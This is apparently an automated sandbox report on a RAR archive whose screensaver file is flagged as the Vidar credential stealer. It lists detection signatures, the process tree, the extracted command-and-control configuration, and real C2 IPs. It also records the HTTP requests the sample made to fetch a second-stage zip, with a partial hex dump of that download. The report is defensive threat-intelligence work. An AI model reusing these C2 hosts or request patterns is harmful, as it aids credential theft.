Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pdf_novichki.rar

Overview

General Information

Sample Name:pdf_novichki.rar
Analysis ID:829691
MD5:214c47a7948ca5d3834c3f21cd1cc208
SHA1:865f07f62dcf68c9929baf4890328e32d7f923fa
SHA256:0a5e037e5954adb680c726089439539073993e2e1114a9ca9e6932e7dd702d9e
Infos:

Detection

Vidar
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Antivirus detection for dropped file
Drops PE files with a suspicious file extension
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Contains functionality to compare user and computer (likely to detect sandboxes)
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

Process Tree

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 1708 cmdline: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail MD5: CA3FDE8329DE07C95897DB0D828545CD)
  • OpenWith.exe (PID: 6360 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: 5D37A62943F1071FFFFE1DE74B8F2778)
  • 7zG.exe (PID: 6632 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\pdf_novichki\" -spe -an -ai#7zMap2692:86:7zEvent4577 MD5: 04FB3AE7F05C8BC333125972BA907398)
  • pdf4ik.scr (PID: 6916 cmdline: "C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr" /S MD5: BF481108AC0A54E82E5683ED8AE58CEB)
    • WerFault.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 1968 MD5: 28D356B668C66115EA55135D24EEFB2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"Botnet": "3", "C2 url": ["https://t.me/zaskullz", "https://steamcommunity.com/profiles/76561199486572327"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        Process Memory Space: pdf4ik.scr PID: 6916JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: pdf4ik.scr PID: 6916JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.pdf4ik.scr.29d80000.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              12.2.pdf4ik.scr.29d80000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                12.2.pdf4ik.scr.29adb058.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  12.0.pdf4ik.scr.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                  • 0x75042a:$s1: JohnDoe
                  • 0x750432:$s2: HAL9TH

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for dropped file
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAvira: detection malicious, Label: WORM/Lodbak.Gen2
                  Source: 12.2.pdf4ik.scr.29d80000.1.unpackMalware Configuration Extractor: Vidar {"Botnet": "3", "C2 url": ["https://t.me/zaskullz", "https://steamcommunity.com/profiles/76561199486572327"]}
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D94697 lstrcatA,lstrcatA,lstrcatA,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,_memset,lstrcatA,lstrcatA,lstrcatA,KiUserExceptionDispatcher,CryptBinaryToStringA,GetProcessHeap,HeapAlloc,_memset,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,CreateThread,Sleep,12_2_29D94697
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D98FB0 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,12_2_29D98FB0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D991B0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,12_2_29D991B0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D85010 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,12_2_29D85010
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D99210 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,12_2_29D99210
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D994A0 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,12_2_29D994A0
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49732 version: TLS 1.2
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9B960 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,12_2_29D9B960
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D93B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D93B60
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA4C40 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_29DA4C40
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9CE80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,12_2_29D9CE80
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D96160 _memset,_memset,SHGetFolderPathA,lstrcatA,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D96160
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D90130 wsprintfA,FindFirstFileA,_memset,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,12_2_29D90130
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9E060 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,12_2_29D9E060
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8F3E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlenA,12_2_29D8F3E0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9B520 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,12_2_29D9B520
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D964B0 _memset,SHGetFolderPathA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,SHGetFolderPathA,wsprintfA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D964B0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9E470 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,12_2_29D9E470
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA,12_2_29D90880

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://t.me/zaskullz
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199486572327
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Joe Sandbox ViewIP Address: 116.203.13.130 116.203.13.130
                  Source: global trafficHTTP traffic detected: GET /zaskullz HTTP/1.1X-Id: 14ac9d852bc10b98f94de36f839b2f59User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1X-Id: 14ac9d852bc10b98f94de36f839b2f59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37Host: 116.203.13.130
                  Source: global trafficHTTP traffic detected: GET /edit.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37Host: 116.203.13.130Cache-Control: no-cache
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 18 Mar 2023 20:39:15 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.224.151.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                  Source: unknownTCP traffic detected without corresponding DNS query: 52.109.88.191
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.224.151.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 52.109.88.191
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.0000000001616000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zip
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zip9
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zip:D
                  Source: pdf4ik.scr, 0000000C.00000002.2415135723.0000000001453000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zipcac5b60b5e28992247664-7ff3f708-074b-4ff4-b2c5-87e7-806e6f6e6963
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zipvqD
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zipx
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/oI
                  Source: pdf4ik.scr, 0000000C.00000002.2424739839.000000002BAB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130z
                  Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://135.181.87.234:80
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001613000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.0000000001621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199486572327
                  Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199486572327http://135.181.87.234:80update.zip;open_open
